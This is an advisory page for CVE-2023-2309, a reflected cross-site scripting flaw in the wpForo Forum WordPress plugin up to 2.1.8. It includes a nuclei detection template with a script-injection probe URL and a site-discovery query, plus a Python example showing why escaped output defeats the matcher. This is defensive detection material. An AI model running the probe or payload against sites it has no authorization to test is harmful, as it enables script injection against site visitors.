CVE-2023-2309: wpForo Forum <= 2.1.8 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: wpForo Forum | PoC: public

Vulnerability description

The wpForo Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wpforo_debug’ function in versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

PoC code [public]

id: CVE-2023-2309

info:
  name: wpForo Forum <= 2.1.8 - Cross-Site Scripting
  author: s4e-io
  severity: medium
  description: |
    The wpForo Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wpforo_debug’ function in versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  remediation: Fixed in 2.1.9
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2309
    - https://wpscan.com/vulnerability/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-218-reflected-cross-site-scripting-via-wpforo-debug
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2309
    epss-score: 0.09761
    epss-percentile: 0.92667
    cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gvectors
    product: wpforo_forum
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wpforo/"
  tags: cve,cve2023,wordpress,wpforo,wpscan,wp-plugin,wp,xss

http:
  - raw:
      - |
        GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"<script>alert(/document.domain/)</script>","wpforo")'
          - 'contains(header,"text/html")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022067f5445d4e45e4dff93904e898419a82aeec7738fa4d6422706a3037055ff37b022100d5fd01fe8edf6508cc2d5a2d7cf3db0c59432668298701bb4eb22c70a4433896:922c64590222798bb761d5b6d8e72950
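The template above decides "vulnerable" with three DSL conditions joined by `and`: the body must contain both the probe string and the literal `wpforo`, the response headers must contain `text/html`, and the status must be 200. The following Python is an added example (not part of the template or of the wpForo plugin) that mirrors that matcher logic and runs it against two constructed responses: a hypothetical page that echoes the `param` query value unescaped, and the same page with output escaping applied (`html.escape`, the equivalent of WordPress's `esc_html()`). It shows why the template fires on the first and not on the second, and why proper output escaping is the remediation for this defect class. All page content and the `render_*` functions are constructed for illustration.

```python
"""Mirror of the nuclei matcher from the CVE-2023-2309 template, run over
constructed responses. Added example; not the plugin's code."""
import html
from urllib.parse import parse_qs, urlsplit

# Probe request path and the body marker the template searches for (both
# taken from the template above).
PROBE_URL = "/community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E"
REFLECTED_MARKER = "<script>alert(/document.domain/)</script>"
HTML_HEADERS = {"Content-Type": "text/html; charset=UTF-8"}  # constructed


def template_matches(status_code: int, headers: dict, body: str) -> bool:
    """Evaluate the template's three conditions with condition: and.

    contains_all(body, marker, "wpforo") / contains(header, "text/html") /
    status_code == 200. nuclei's `header` is the raw header block, so the
    dict is flattened to text before the substring test.
    """
    header_blob = "\r\n".join(f"{k}: {v}" for k, v in headers.items())
    return (
        REFLECTED_MARKER in body
        and "wpforo" in body
        and "text/html" in header_blob
        and status_code == 200
    )


def _param_from(url: str) -> str:
    """Decode the `param` query value the way a server would (percent-decoding)."""
    return parse_qs(urlsplit(url).query).get("param", [""])[0]


def render_unescaped(url: str) -> str:
    """Hypothetical forum page that reflects the query value verbatim.

    Constructed to illustrate the defect class (missing output escaping);
    this is not the plugin's wpforo_debug code.
    """
    return f'<div id="wpforo-wrap">debug: {_param_from(url)}</div>'


def render_escaped(url: str) -> str:
    """Same page with output escaping; html.escape mirrors esc_html() in WordPress."""
    return f'<div id="wpforo-wrap">debug: {html.escape(_param_from(url), quote=True)}</div>'


def check_page(renderer) -> bool:
    """Run the matcher against a 200 text/html response produced by `renderer`."""
    return template_matches(200, HTML_HEADERS, renderer(PROBE_URL))


if __name__ == "__main__":
    print("unescaped page matches:", check_page(render_unescaped))  # True
    print("escaped page matches:  ", check_page(render_escaped))    # False
```

Because the matcher requires the raw `<script>` marker, an escaped body (`&lt;script&gt;...`) never satisfies it, which is the same property a reviewer checks when confirming the 2.1.9 fix: the parameter may still be reflected, but only in entity-encoded form.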
